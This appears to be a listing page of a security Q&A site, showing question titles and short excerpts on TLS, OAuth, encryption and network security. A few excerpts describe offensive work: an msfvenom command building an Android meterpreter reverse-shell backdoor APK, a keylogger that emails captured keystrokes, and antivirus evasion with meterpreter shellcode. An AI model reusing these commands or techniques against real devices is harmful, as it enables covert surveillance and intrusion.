security.didici.cc

Is an OCSP request verified via TLS?

12 minutes ago

I was wondering if the connection towards the OCSP responder/server is TLS encrypted itself. Meaning that the client requesting a validity check for a certificate verifies the OCSP server's certificate? If so that OCSP server should be signed by the a root ...

How much time does rockyou take to bruteforce [closed]

3 hours ago

How much time does the rockyou.txt wordlist take to bruteforce an MD5 hash password using hashcat?

EFS-encrypted files not lost when domain admin resets password

3 hours ago

There are many articles out there stating that encrypted files of a user are lost after an administrator resets the password of that user. I tried that: Logged on as user (Domain User) with password 54321 created a file named test.txt on the desktop encry ...

Accessing router traffic

9 hours ago

I want to monitor traffic on my home router, how to do this? I have Huawei router. I have searched this question before asking here but most of the sites and blogs just mentioned about hacking and other stuffs. My case is simple I just want to monitor all ...

Is there a service that provides an api for running user-provided code in a variety of languages?

10 hours ago

I'm attempting to scaffold out a development training project, and am looking for some kind of service that provides an api that I can POST a chunk of code to (in whatever language specified), and return the results or errors of running that code. An exam ...

Can a file extension be spoofed in windows?

12 hours ago

For example can .exe file be spoofed in .txt or .mp3 in windows and still be executed as an executable. I know some basic methods like: *using right-to-left override character (U+202E) *winrar 4 zip file exploit (no longer working) But the question is: I ...

What is a pre-warmed secret?

16 hours ago

As described here: https://tools.ietf.org/id/draft-ietf-oauth-security-topics-13.html#proposed-countermeasures-2 Note on pre-warmed secrets: An attacker can circumvent the countermeasures described above if he is able to create or capture the respective ...

RubberDucky KeyLogger

16 hours ago

I'm working on a keylogger powershell script, but I want the logs to be sent to an email address. It is successfully doing so, except the email is only sent on machine restart, or if I manually execute the c.cmd command. Any way to schedule it, some sort ...

Does hashing an AES-GCM-256 encrypted text with SHA-512 help reveal the original password and iv for the AES-GCM-256 function

20 hours ago

If some text is encrypted using proper AES-GCM-256 encryption (with a unique password, iv, and a resultant tag), would the AES-GCM-256 encryption in any way be weakened, if the encrypted text was then fed into a one-way hashing SHA-512? My concern is that t ...

PCI scope "Encrypted cardholder data that is accessible to an entity that also has access to the decryption key"

20 hours ago

I have a question related to this FAQ: https://pcissc.secure.force.com/faq/articles/Frequently_Asked_Question/How-does-encrypted-cardholder-data-impact-PCI-DSS-scope?q=how+does+encrypted+data+impact+the+scope&l=en_US&fs=Search& It says: "The following ar ...

Crack 7Z password if I also have the original file

21 hours ago

Some of my files have been encrypted by a ransomware. So I need a password to decrypt them. I understand the password is the same for all files, and that it is impossible to guess it or to find it by massive tests. I can find some backup of files (unfortu ...

Someone found an obfuscated path on my website. Is this possible without hacking my site?

22 hours ago

I am running a server with Django and Nginx. I tried to hide the admin panel by assigning it a 50-digit random string as URL (something like https://mydomain/asidfhifuerbdsi...). Now someone found this URL and I am wondering if this was possible without ha ...

Subdomains resolving to bogon IPs

22 hours ago

During experimentation with the gobuster tool, and trying to find the subdomains matches of a domain (let's call that testdomain.com), I got some strange results and I explain. The command used was $ gobuster dns -d testdomain.com -w mywordlist.txt -o sub ...

RSA signing - Maximum input data size

22 hours ago

From what I have heard, with RSA, the data to be encrypted/signed must be smaller than the key size. So with a key size of 2048 bit I can't encrypt/sign data larger than 2048 bit. I've been playing around with node-rsa and managed to sign data larger than ...

Facial recognition countermeasures

23 hours ago

I am writing a story where the protagonist needs to assume a new identity and ensure the other party cannot ascertain his real identity. The roadblock here is that the other party can run facial recognition by taking his photo during the meetings and run ...

How can one avoid being identified by facial recognition in a public setting? [closed]

23 hours ago

Facial recognition is ubiquitous and methods like disguises, surgical masks and makeup are becoming ineffective owing to the improvement in algorithms. In light of these advances, what are some countermeasures to avoid being identified in a public setting ...

SQL injection detection engine in WAF

1 day ago

I'm working on a WAF and I found myself struggling with detecting SQL injections. I've read every single article I've seen and none of them explain how I can prevent SQLi. By reading previous questions I understand that using a bunch of if statements (or ...

Windows RPC Vulnerability (CVE-2017-8461)

1 day ago

I am currently taking classes for Cyber Security and having an issue. I have the following CVE (CVE-2017-8461) https://nvd.nist.gov/vuln/detail/CVE-2017-8461 https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8461 There are two questions in my assignment ...

Finding info on Windows RPC Vulnerability (CVE-2017-8461)

1 day ago

I am currently taking classes for Cyber Security and having an issue. I have the following CVE (CVE-2017-8461) https://nvd.nist.gov/vuln/detail/CVE-2017-8461 https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8461 There are two questions in my assignment ...

Is there a bank in the United States that uses email encryption with S-MIME or GPG?

1 day ago

We just founded a subsidiary in the United States. For this new legal entity we also need a bank account. With our bank account manager in Germany we can encrypt our emails using the S-MIME protocol. This is quite convenient for everybody. For me it seems ...

Openid nonce replay attack in auth code flow

1 day ago

Looking at this question Openid connect nonce replay attack and the answer by @benbotto. I understand the replay attack in implicit flow but unable to understand it for auth code flow. Let's say an attacker intercepts the authentication response. The atta ...

google-authenticator. How do I generate six digits code from my Linux desktop?

1 day ago

Consider the following situation: I have an account at https://www.mercadolibre.com.ar. According to a new policy on login, I am asked to provide a six digits Google Authenticator code; I have installed google-authenticator on my Linux (Fedora) machine; I ...

Extended expiration on JWT

1 day ago

When we are talking about JWT authentication, how big of a security risk would it be to eliminate the concept of a refresh token and just have a single JWT have an expiration time of, let's say 30 days. The refresh token could still be accessed by a cooki ...

Should email password be encrypted in a django app when using TLS?

1 day ago

I have seen multiple videos/tutorials regarding how to setup the email system in Django. It seems that they all assume as long as the password is stored in an environmental variable, no encryption is required. Is that so? Shouldn't passwords be encrypted? ...

Using Github's Public IP Address as Remote URL

1 day ago

My company distributes software that runs on locally installed Ubuntu Virtual Machines. To update the software, we pull our latest code down from Github. Some IT departments have github blocked on their firewall. One IT guy suggested to us that they would ...

I need to secure my access to SQL Server for application accounts, but no one can know the application passwords. How?

1 day ago

Here's our scenario. I have a NodeJS server running that connects to a Microsoft SQL Server using an application account (SQL Basic Auth). The Username and Password were stored in the configuration files when the app was created. We now want to tighten ...

How to verify the identity of someone you met online?

1 day ago

So, I need to sign up a contract with someone I met online in order to start doing business with him. But how could I possibly know that the information he would put on the digital contract are his real info? How could I know his real name? Is there a met ...

How to generate a secure invite token in a Firebase app?

1 day ago

I have a Firebase app using Realtime Database and cloud functions In my app, a user is part of a group and has access to all the data in the group I'm trying to create a way for a user to invite another into a group Example: First, Alice logs in. She crea ...

Invoke GetProcAddress returns nothing

1 day ago

I try to execute a meterpreter shellcode to a windows machine. In order to bypass the AV, I try to load the shellcode in the memory thanks to the DelegateType Reflection technique. Below, the first lines of the powershell commands: $systemdll = ([AppDomai ...

If a malicious 3rd party app is able to intercept and modify the initial Auth_URI redirect of an OAuth flow, is it mitigable after the fact?

1 day ago

Related to a question I have at stackoverflow: https://stackoverflow.com/questions/69274715/is-public-key-encryption-acceptable-for-protecting-last-leg-of-this-openid-conne If a malicious 3rd party app is able to intercept the initial Auth_URI redirect an ...

XSS inside of a javascript string, with unusual filter

1 day ago

While making a website I made an interesting mistake, and I'm wondering if this could be used to achieve XSS. I've come very close, but not quite. I can put my user input into a string inside of a tag. It looks something like this: // some code above so ...

Writing a remote rop chain x64

2 days ago

I am working on a blind ROP exploit, but I'm stuck at writing the ropchain. I have 2 options: -ret2libc -writing a ropchain I leaked 50% of the libc and the entire binary but my problem is I can't open libc in ida, and can't use ROPgadget on it. So I'm tr ...

Looking for origin/ verification of malicious domain names

2 days ago

My network sniffer for websites has discovered a number of hosting domains in the report which I can not correctly assign to categories. I don't know if there are providers behind these domains that load tags or trackers or if malware/adware simply appear ...

Is it possible to use cookie-based single sign-on authentication scheme if sites do not share a common DNS parent domain?

2 days ago

According to Wikipedia, A simple version of single sign-on can be achieved over IP networks using cookies but only if the sites share a common DNS parent domain. This means that if the user has authenticated on login.foo.org, then the web-server on login. ...

Intercepting responses using mitmproxy in Python. Problem in decryption

2 days ago

I have set up MitmProxy with a Python script to intercept network responses from one domain, used by a Desktop App. However, when I start up the App, I get the following series of transactions { "code": 200, "message": "Success", "data": { ...

Can I safely preview a short link?

2 days ago

There are a lot of different URL shorteners out there, like Bitly, goo.gl (discontinued), Ow.ly or TinyURL. Besides their main purpose of shortening a link, they also: obfuscate the actual URL, so that the user does not know in advance which URL will actua ...

MITM attack on public wi-fi and ISP wired connection

2 days ago

I know how MITM attacks work(theory/practical YT videos on the subject etc), but a bit confused and not sure what actually the worse case scenario that can happen. I'll explain. So, if I'm using a public VPN and someone indeed is able to force my device t ...

Kali Linux is prompting me for the password to 'Default Keyring' but I never set one?

2 days ago

I am trying to login to a VPN on kali linux but when I try to connect using the VPN file I have, it prompts me to unlock my default keyring, but I never set the password for it. I am using Kali Linux on VirtualBox.

Intercept and modify Server-Sent Events (EventSource API)

2 days ago

I'm working with a web application using Server-Sent Events (SSE, EventSource API), similar to WebSockets. However, none of the commonly penetration test tools seem to fully support this. I've tried Burp Professional, OWASP ZAP and mitmproxy (also with Ge ...

Possible no sql injection?

2 days ago

We are developing an application in Dotnet MVC with mongodb as a database. We use below mentioned query in order to fetch the data from the database. Controller code [Get("getmsg")] Public HttpResponseMessage GetMsg(int id = "", String msg = "" ) MongoDb Qu ...

problems to verify ecdsa certificate

2 days ago

I'm working on an application which uses ECDSA certificates. After the cert generation, they should be verified but currently the following error is received: C = CA, ST = BC, L = City, O = Corp, OU = Software, emailAddress = [email protected], CN = ...

School got into my daughter's personal google docs [closed]

2 days ago

My daughter was at school, on a chromebook I bought for her, on her personal account. She had a google doc with a few WW2 dark humor jokes in it she had written saved from home. No big deal. A few hours after she edited them (and I called to yell at the p ...

How to do auth without user interaction in an enterprise environment?

2 days ago

We are building a Chrome Extension that will be force-installed on each employee's browser for the companies we work with. We currently use OAuth but many employees are forgetting to sign up. We are thinking of replacing OAuth with something that doesn't ...

Is it safe to use conntrack on Linux bridge devices?

2 days ago

I have a server with a number of Linux bridge devices for use with groups of virtual machines - some internet-routed, some intentionally unrouted. I have stateful firewalling in place for traffic traversing across and between those bridges. Excerpt: ip6ta ...

client-server data sharing is not encrypted in https

3 days ago

I am using https for my website. I am not getting clear idea about how https internally works and how it makes our website more secure. If the headers or data is encrypted as mentioned here SO then it can be allow for decode or not. My Question: when I ...

Android 10 smartphone run out of service - evaluating the risk

3 days ago

I have a Nokia 6.1 Android One phone which has reached EOL in terms of security updates last April. Now I'm trying to evaluate the risk that comes from using an outdated phone. I'm using it for WhatsApp, browsing, some mailing, and my blood glucose monito ...

What's the difference between CentOS and RHEL security patches?

3 days ago

So I've been compiling security advisories for various OSs, including both CentOS and RHEL. What I find confusing is CentOS should be a "similar but different" OS from RHEL counterpart, most notably from support for security patches. When I searched for R ...

Generate key pair and entropy

3 days ago

I would like to use the method described in https://connect2id.com/products/nimbus-jose-jwt/examples/jwk-generation to generate a key pair in a java application: import java.util.*; import com.nimbusds.jose.jwk.*; import com.nimbusds.jose.jwk.gen.*; // ...

Generate key pair and entropy

3 days ago

I would like to use the method described in https://connect2id.com/products/nimbus-jose-jwt/examples/jwk-generation to generate a key pair in a java application: import java.util.*; import com.nimbusds.jose.jwk.*; import com.nimbusds.jose.jwk.gen.*; // ...

What is Google's "match the number" verification trying to achieve?

3 days ago

When I log into my Google account from my laptop with 2FA enabled, I usually get a prompt on my smartphone in order to confirm the log in. I tap OK and then I am logged in. However sometimes I am not immediately logged in after that. My laptop then shows ...

What is the exercise called when trying to identify an organization's risk health?

3 days ago

This is the doc I used. It's about HIPAA https://dochub.com/he141575/EB5r38Awl8kYbW4wXzZ1kD/gibson-p1-ch-1-4-pdf?pg=88

What is the exercise called when trying to identify an organization's risk health? [closed]

3 days ago

This is the document I used. It's about HIPAA https://dochub.com/he141575/EB5r38Awl8kYbW4wXzZ1kD/gibson-p1-ch-1-4-pdf?pg=88

Is Using random salt to pbkdf2 for every request to rest api good/bad?

3 days ago

Here are my conditions: My rest API must accept username and plain password. But, that's very bad. That's why the client must encrypt the password first and my rest API will decrypt it to get the plain password. My client and rest API already set the encr ...

Are open wifi networks that require a user-name and password to login secure?

3 days ago

Are open wi-fi networks that require a user-name and password unique to every individual to login secure? I use Apogee wifi.

Are non-encrypted wifi networks that require a user-name and password to login secure?

3 days ago

Are open wi-fi networks that require a user-name and password unique to every individual to login secure? I use Apogee wifi.

Are non-encrypted wifi networks that require a username and password to login secure?

3 days ago

Are non-encrypted wifi networks that require a username and password unique to every individual to login secure? I use Apogee wifi.

How best to cryptographically sign scientific papers?

3 days ago

Academia has had some high profile cases of forged identity; for instance, in the last decade the publisher Springer has had to retract 62 papers for this reason alone. Usually these aren't high-effort attacks, either - simply email address spoofing, etc. ...

Ramifications of Including "localhost" in the subject alternative field of a x509 certificate

3 days ago

Are we inviting any problems if we add localhost and 127.0.0.1 to the subject alternative name field of an x509 certificate? We are still trusting the appropriate root CA, but relaxing the rules of the name just a bit.

Apple’s private relay TLS connection

3 days ago

If I switch on Apple’s private relay function on my iPad will the TLS handshake still be with the website I am visiting or with the ingress proxy by Apple? Or in other words: can Apple or the egress proxy read my internet traffic with this function ena ...

How to encrypt user Clear-text password Freeradius

3 days ago

I recently set up a freeradius server and would like to change user password which is presently in cleartext to encrypted in the /etc/freeradius/3.0/users file. This is what it looks like on server. Part 2: when I authenticate on the server I can see the ...

How to encrypt user password in Freeradius [migrated]

3 days ago

I recently set up a freeradius server and would like to change the user password that is presently in cleartext to encrypted in the /etc/freeradius/3.0/users file. This is what it looks like on the server. When I authenticate on the server, I can see the ...

Is it a myth that signing up for social media puts your email open for phishing attacks?

3 days ago

So far I have owned a Google profile since 2016, and I had no problems until now when I began detecting unusual/bizarre messages in my 'Spam' folder. This suspects me that operating a social networking account (e.g., Twitter), which I did back in August, ...

Can I download a signature of webpage on https protected connection?

3 days ago

Let's say that Malory owns an official website that now says that her birthday is on 25th of July. I can connect to that website by https, and SSL certificate of the connection says "issued to Malory". Now I want to download that page as an evidence, that ...

Cannot find specific chat on Instagram data package

3 days ago

I've been tasked to recover a specific Instagram chat for a client, the whole conversation was deleted by the client a few months ago. My first thought was to download the client's Instagram data zip and recover the conversation history there, but this sp ...

Is using a windows user account password necessary on a PC with bitlocker and a complex pin?

3 days ago

Is there a security risk to disabling the windows user account password, since my PC is already unlocked with a complex pin at boot time? I have my PC configured with sleep disabled. I'm running windows 10 pro. For example, is windows network security red ...

Multiple Established TCP Connections on Port 3389 - Is my server compromised?

3 days ago

If I run netstat -an on my Windows Server 2019 it shows multiple connections on Port 3389 (which is RDP). The first IP address is mine, however I can't explain the other two connections. They both change their IP address about every minute and if I google ...

Requiring Google Mobile Service token

3 days ago

I'm pentesting an android application written in Cordova and while inspecting the network traffic I found some interesting endpoint that I would like to test. However, this endpoint needs a tokenID (ex. eyJ[...].eyJ[...]) and I don't know why, even after d ...

Windows Defender's MsMpEng.exe Access lsass.exe

4 days ago

I detected an activity last week on our SIEM system. The MsMpEng.exe which belongs to Windows Defender access lsass.exe. I search it on the net for learn is it a normal activity or is it abnormal then there is no information about it. Activity's event ID i ...

Why doesn't Windows send enabled cipher suites during TLS handshake?

4 days ago

I have a system with custom cipher suites specified in this registry key HKLM\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002!Functions TLS_AES_256_GCM_SHA384 TLS_AES_128_GCM_SHA256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 TLS_ECDHE_ECD ...

Why doesn't Windows send all enabled cipher suites during TLS handshake?

4 days ago

I have a system with custom cipher suites specified in this registry key HKLM\SOFTWARE\Policies\Microsoft\Cryptography\Configuration\SSL\00010002!Functions TLS_AES_256_GCM_SHA384 TLS_AES_128_GCM_SHA256 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 TLS_ECDHE_ECD ...

Can you subvert a physical system at runtime?

4 days ago

In case of a virtual machine it is possible to break out of the VM and gain code execution on the host. In that way you could evade any detection mechanism for malware inside the VM and maybe even on the host. In case of the virtual machine malware would ...

CRM with Client Side Encryption

4 days ago

I've been searching a way to create a strategy to save and secure data but I don't seem to find the answers I'm looking for so if someone has some answers to the questions I'll ask it would be helpful. The company I'm working in wants to develop a CRM tha ...

Logout functionality with JWT Session tokens

4 days ago

As per my understanding, JWTs are signed tokens which can be used to identify users, if used as session tokens, they can eliminate need to store session on server ie. they are stateless. Suppose I store user_id in JWT token and use it to validate users on ...

No User SID in the sysmon event with id 1 (process creation)

4 days ago

Why is there no user SID in the sysmon event with id 1 (process creation)? Are there any configuration options to get it?

When connecting an Arduino Uno to the internet (ethernet) what are some attacks it's susceptible to and how can I secure against them?

4 days ago

I am connecting an Arduino Uno to the internet via ethernet (using the ethernet shield v2) and querying NTP time. Making requests to a NTP server is the only internet related thing it does. You can using the ethernet shield use an SD card to host data, I ...

Servers migrated to Azure - what network security is needed

4 days ago

We used to have on-prem servers on our local network protected by a firewall. By now, we have migrated all of our servers to Azure so all we have in the office is our personal computers. Our firewalls and switches are now 6 years old and we are planning o ...

What is the latest version of ThinkPad laptops that doesn't have Intel Management Engine or similar remote controller built-in?

4 days ago

I work in cybersecurity and would like to find an older laptop that doesn't have the Intel Management Engine built-in, while still able to run a Debian OS well. I have an IBM ThinkPad t42 with 42T0273 system board laying around, which was introduced in la ...

Is it possible to interact with firebase database using credentials obtained from an APK?

4 days ago

During the static analysis while pentesting an android application I found the following information to connect to a firebase instance. 1:**REDACTED**:android:**REDACTED** AIza**REDACTED** https://**REDACTED**.firebaseio.com **REDACTED** **REDACTED**.apps ...

WMI commandline utility, console window host, and windows command processor all opening for a split second

4 days ago

Basically these 3 processes open for about 1/3 of a second and then instantly close on my task manager. I don't know what it is and I wasn't able to find anything on google about it. I am a little worried it might be malware but like I said I just don't k ...

aircrack-ng on Raspberry pi 3 and WiFi adapter

4 days ago

I am just getting into ethical hacking and cyber security and would like some advice regarding USB wifi adapter. I am hacking on Raspberry PI 3 which is running kali linux. I have been following this video: https://www.youtube.com/watch?v=WfYxrLaqlN8&ab_c ...

UEFI Encrypt disk on boot

4 days ago

I want to make UEFI/UFI encrypt disk with AES on boot, is it possible? If yes, how can it be done?

Metasploit how to get target's telephone number?

4 days ago

Hello, I'm new at metasploit and I created a backdoor with msfvenom like this: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R> /var/www/html/test.apk and I connected to my android device. I can dump sms, call logs and other things but I want le ...

Metasploit how to get target phone's telephone number?

4 days ago

I'm new at metasploit and I created a backdoor with msfvenom like this: msfvenom -p android/meterpreter/reverse_tcp LHOST= LPORT= R> /var/www/html/test.apk and I connected to my android device. I can dump SMS, call logs and other things but I want to le ...

Realistically, how likely would an average "nobody" user's machine be infected with a virus that can survive a full-format re-install?

4 days ago

I've been experiencing degraded system performance due to undetermined reasons and plan on adding an M2 SSD drive to my 6 year old laptop and doing a fresh re-install. Being Windows 10, I don't have install media, and plans to grab the ISO, make a bootabl ...

Is there some way to "fully delete" received and sent SMS messages (and any other "deleted" data") on my cellphone?

4 days ago

I have a cheap cellphone bought about ten years ago. It has a physical SIM card. I have in-phone "deleted" all sent and received messages, but very strongly suspect that these are still there (as well as any deleted contacts) whether I stored them on the ...

How to do forensics on RaspberryPi in home network?

4 days ago

While debugging some strange effects in my home network (bad video call quality due to packet loss) I found out this only happens when my RBPI is connected to the network. When I wanted to log in I discovered that the default password was not working any ...

TLS session Identifier

5 days ago

I capture traffic between my client and web server which supported by TLS 1.2. I find that session ids are different between 2 peers (client and server) in same tls handshaking process. Why should these two values be different?

Career path to security architect

5 days ago

I can't sleep because I can't find answers without advice. So, I thought of two career paths towards security architect. #1 system admin (12)years> network engineer (12)> security architect (12) #2 system admin(5) > network engineer (10) > security architec ...

Almost unattended generation of "a pretty good keypair"

5 days ago

I need to generate quite a lot of gpg-keys for different tasks on my Debian Bullseye (Stable) machine. Also I want the highest level of security while being able to automate as much as possible. Therefore I wrote a bash-script with the following features ...

New identity in a modern setting

5 days ago

I am writing a story where the protagonist uses a fake identity when having meetings with a political entity. His associates have never met him before, but his fingerprints and face already exist in the government's database. The other party will run pass ...

Countermeasures for modern facial recognition system [closed]

5 days ago

I am writing a story where the protagonist uses a fake identity when having meetings with a political entity. His associates have never met him before, but his fingerprints and face already exist in the government's database. The other party will run pass ...

Countermeasures for one to many facial recognition [closed]

5 days ago

I am writing a story where the protagonist uses a fake identity when having meetings with a political entity. His associates have never met him before, but his fingerprints and face already exist in the government's database. The other party will run pass ...

Facial Recognition Countermeasures [closed]

5 days ago

I am writing a story where the protagonist needs to assume a new identity and ensure the other party cannot ascertain his real identity. The roadblock here is that the other party can run facial recognition by taking his photo and running it against a gov ...

Why does ECC not have an encrypt capability in GPG, but RSA does?

5 days ago

I'm attempting to establish a process for setting up a new GPG identity for myself and my threat model. Much of it is following guides which I believe are still considered best practices: https://github.com/drduh/YubiKey-Guide https://blogs.itemis.com/en ...

How reliable is a mathematical model of a human fingerprint for identification?

5 days ago

How reliable is a mathematical model of a human fingerprint for identification? I am looking for a way to uniquely identify individuals that is very reliable and easy to use that does not require storing actual biometric data. Storing the actual biometric ...

Error to crack ssh key with john the ripper

5 days ago

I'm making a challenge boot2root, I obtained an ssh key through xxe, now I'm trying to crack it, I generated its hash with ssh2john: python ssh2john.py id_rsa > id_rsa.hash but when I try to crack it with john: john --wordlist=rockyou.txt id_rsa.hash jo ...

VirtualBox - Transfer file from guest to host machine

5 days ago

I'm working on malware analysis, and using VirtualBox for that. I have created virtual machine (windows 7), in which I am going to inspect the malware. I would like to send back to the host machine, the files and data from the analysis before I destroy the ...

CIS hardened linux vs SELinux(Security Enhanced)

6 days ago

What are the differences between the CIS hardened linux and SELinux(security linux)? Also, all the public cloud service providers support CIS hardened linux. Does it mean SELinux has lost the battle? Or in terms of security, which flavor should I be choos ...

Decode malicious javascript

6 days ago

Probably as most of Facebook users I receive many malicious requests with link and JS. I usually delete or ignore them, but now out of curiosity decided to research it. I've unsuccessfully tried some deobfuscating services. Full virus code is about 150K. E ...

Security Libraries and Frameworks for Java

6 days ago

I recently read that OWASP ESAPI will be discontinued and no longer be updated. Is there an alternative to OWASP ESAPI for Java and for Spring based Web Services?